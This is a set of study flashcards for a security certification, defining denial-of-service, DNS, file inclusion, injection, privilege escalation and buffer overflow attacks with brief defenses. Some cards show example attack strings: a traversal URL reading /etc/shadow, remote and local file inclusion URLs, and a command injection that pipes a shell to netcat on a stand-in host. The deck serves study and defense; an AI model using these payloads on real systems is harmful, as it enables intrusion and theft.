Malicious activity Flashcards

1
Q

What are few Denial Of service attacks?

A
  1. SYN flood
  2. Amplified DNS attack
  3. Ping flood
  4. PDOS (Permanent Denial Of Service)
  5. Fork Bomb - in this attack, a process replicates into multiple processes within a memory and taking up all the memory resource of a system until it crashes. Fork refers to a process here.
  6. DDOS attack -
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What are few prevention measures against DDOS attacks?

A
  1. Implement IPS (Intrusion prevention System)
  2. Black-hole/sinkhole
  3. Elastic Cloud Infrastructure
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is DNS cache poisoning attack?

A

In this attack, a threat actor inserts malicious DNS entries (Domains pointing to Malicious IPs) into DNS resolver.

Protection techniques -

  1. Use DNSSEC (DNS Security Extension) - In this technique, DNS responses that DNS resolved get from other DNS servers are sent with cryptographic signatures.
  2. Implement good security measures for protecting DNS resolver.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What is DNS amplification attack?

A

In this attack, an attacker spoofs the IP of a victim and sends some command to DNS server requesting data.
DNS server/resolver responses back with large amount of DNS data that overwhelms the victim device.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is DNS tunnelling attack?

A

In this attack, an attacker wraps some other protocol Data like HTTP, SSH inside the DNS data to cross through firewall rules.
They might do it to exfiltrate data or command control.

To protect from it, analyze DNS log data.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is Domain Hijacking attack?

A

It is an attack in which an attacker takes over someone’s else domain.
They might to deface the domain or to infect users who visit this site.

To protect from it, we should protect registration account information.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is DNS Zone transfer attack?

A

In this attack, an threat actor mimics an authorized system to request and obtain the entire DNS Zone data for a domain.

This kind of attack can expose sensitive data about a network like their network architecture.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What is a directory Traversal attack?

A

In this attack, a threat actor is able to access unauthorized files /folder/commands either in the Web-document root directory or in some other folder on the same server that has Web-document root directory.

Here is an example of directory traversal -

https://diontraining.com/../../../etc/shadow

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What is an inclusion attack?

A

Inclusion attack - In this attack, a threat actor is able to include some file in the application and eventually get the application to run this malicious file.

Example - threat actor might include a file into a web application and run this malicious file on the server which might lead to data theft, unexpected actions taking place on server or run some arbitrary code on the server.

It is of 2 types -

  1. Remote File inclusion -
    2.Loacl File inclusion
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What is remote file inclusion attack?

A

In this attack, a threat actor finds a file inclusion vulnerability in an application and is able to include a remote file into an application (Most often a web-application).
Once file is included, web-server application might runs this malicious file.

Example -

https://diontraining.com/login.php?user=http://malware.bad/malicious.php

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is local file inclusion?

A

In this malicious activity or attack, a threat actor tries to include a file that already exists on the server host.

How can a file already be existing on the web-server?
- the webpage might have some online form that accepts file and attacker might be have to upload a malicious file into the server host.

So in this attack, a threat actor attempts to make the web-server application run this locally-included file.
Normally this includes Directory Traversal -

Example -
https//:diontraining.com/login.php?user=../../windows/system32/cmd.exe%00

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What is an arbitrary code execution attack?

A

This attack takes place when an attacker is able to run any malicious code/command of his own choice on the target system.

How does an attacker do it -
They exploit some vulnerability in the web application/system or network such a buffer Overflow, Injection attacks, File inclusion attacks etc.

If this malicious code is executed remotely, it is know as remote arbitrary code execution.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What is an privilege escalation attack?

A

This is an attack in which an attacker is able to escalate his privileges to a system resource. Example - gaining write permission instead of having only read permissions.

2 types -

Vertical privilege escalation - Like increasing permission levels from user account to admin account.

Horizontal privilege escalation - Like switching from 1st account permissions to seconds where both are user accounts but 2 account has access to a certain file or resource in the system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What are 2 main kinds of root-kits?

A

Kernel Level rootkit and
User mode root kit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

How can we protect from File Inclusion attacks?

A
  1. Sanitize user input
  2. Perform user input validation
  3. Implement proper access controls for every account including Web service account (for the users who is accessing the web-server)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is a cookies poisoning attack and how we can protect from it?

A

It is the process of modifying the contents of a cookies (after it has been created by the server for sending to client’s browser) and the exploit the vulnerabilities in the web application.

How can we protect form it:
1. Encrypt cookies
2. Delete cookies when session is done

17
Q

What are on-path attacks?

A

This is an attack in which an attacker inserts himself in the middle of authenticated session between client and the web server.
Doing so, he can capture, monitor and analyze the traffic between client and the web-server.

An attacker can accomplishes this attacker by playing a downgrade attack.

18
Q

What is SSL Stripping attack?

A

In this attack, the attacker tricks the encryption application with an HTTP connection instead of an HTTPS connection.

19
Q

What is LDAP injection attack?

A

It is similar to SQL injection attack.
In this attack, an attacker exploits some vulnerability in the LDAP protocol.
Normally this attack takes place on the websites that use LDAP protocol to authenticate users (using a web application sign in page that uses LDAP protocol on the back end).
So in this attack, an attacker sends a malicious LDAP command/statement to the server.

Protection technique -
1. Do input sanitization
2. Do input validation

20
Q

What is an command injection attack?

A

In this attack, a threat actor is able to execute an arbitrary shell command via a vulnerable web application.

Ex - Remember the scenario !!!! checking the ping !!!!

diontraining.com && /bin/sh |nc hacked.diotraining.com 443

21
Q

What is process injection attack?

A

It is a method of executing arbitrary code in the address space of a separate live process.
Process injection attacks are commonly used in malware, rootkits, and advanced persistent threats (APTs) to evade detection and maintain persistence on compromised systems.

Learn more about these later. Use ChatGPT.

22
Q

What is a Software Weakness?

A

A software weakness refers to a flaw or defect in the design, implementation, or configuration of software that can potentially lead to security vulnerabilities.

Examples of software weaknesses include buffer overflows, input validation errors, lack of proper authentication mechanisms, insecure configuration settings, etc.

These can be prevented using secure coding practices.

23
Q

What is the difference between Software Weakness and Vulnerability?

A

software weaknesses are generic flaws or defects in software that could potentially lead to vulnerabilities, while vulnerabilities represent specific instances of weaknesses that can be exploited by attackers to compromise the security of a system.

24
Q

What is CWE?

A

It stands for Common Weakness Enumeration. It is a database or table that is managed by Mitre to keep track of common software weakness.
It provides a common language (a structured format) to define these Software Weaknesses.

25
Q

What are 2 most common indicators of On-path attack (Man-in-the-middle attack)?

A

1st indicator is there can be delay in our session (as first our traffic goes through the on-path computer who might decrypt/encrypt data and then passes on to the server).

2nd indicator is that out browser might not show the lock icon besides the URL and there can be certificate warning as the certificate is not signed by the CA (Certificate authority).
26
Q

What is Man-in-the-browser attack?

A

In this attack, an attacker exploits some vulnerability in the browser and is able to remotely connect to browsers and can modify, collect the session information. He can also capture keystrokes and might be able to steal user’s password for different accounts.

 This attack is normally initiated by sending the malicious link to user and tricking the user to click on it to run the malicious script to exploit vulnerability in the browser.
27
Q

What is a DNS sinkhole?

A

DNS sinkhole is a specific record in a DNS server that does not give the correct result for a DNS name resolution request. Normally this is used by investigative authorities to stop the botnet or some malware to connect to the command and Control server. Usually malwares have domain names of command and control server that they connect to.

28
Q

What is the most effective counter measure against replay attack?

A

Use of Timestamps and sequence numbers

29
Q

How can we investigate script related acttcks?

A

Using logs

30
Q

A note on scripting attack

A

PowerShell cmdlets use verb-noun structure such as Invoke-Command. Bash scripts typically call either /bin/bash or /bin/sh. If logs show Verb-noun cmdlets or calls to bash or sh, it may be a potential indicator.

31
Q

What are some of the common verbs and common nouns used in PowerShell?

A

Common verb - Get, Add, Test, Remove, New, Find, and Move

Common noun - Command, Service, Location, Process, Childiterm, WMiObject, PSDrive

WMI stands for Windows Management Instrumentation.

32
Q

What is memory leak?

A

It is a bug in a computer program that makes the program use more and more memory the longer it runs.

It is possible to detect memory leaks by looking at the memory usage per application in operating system tools such as Windows Task Manager.

33
Q

What is Buffer Overflow attack?

A

In these attacks, an attacker sends large amount of data to the application than it can handle, which results in buffer over flow.

This large amount of data normally has NOPs (No operations that tell the system/OS to go to the next memory location and execute the code over there)
and malicious script at the end of NOPs.

Using these NOPs, an attacker can make the system execute malicious script in the memory.

34
Q
A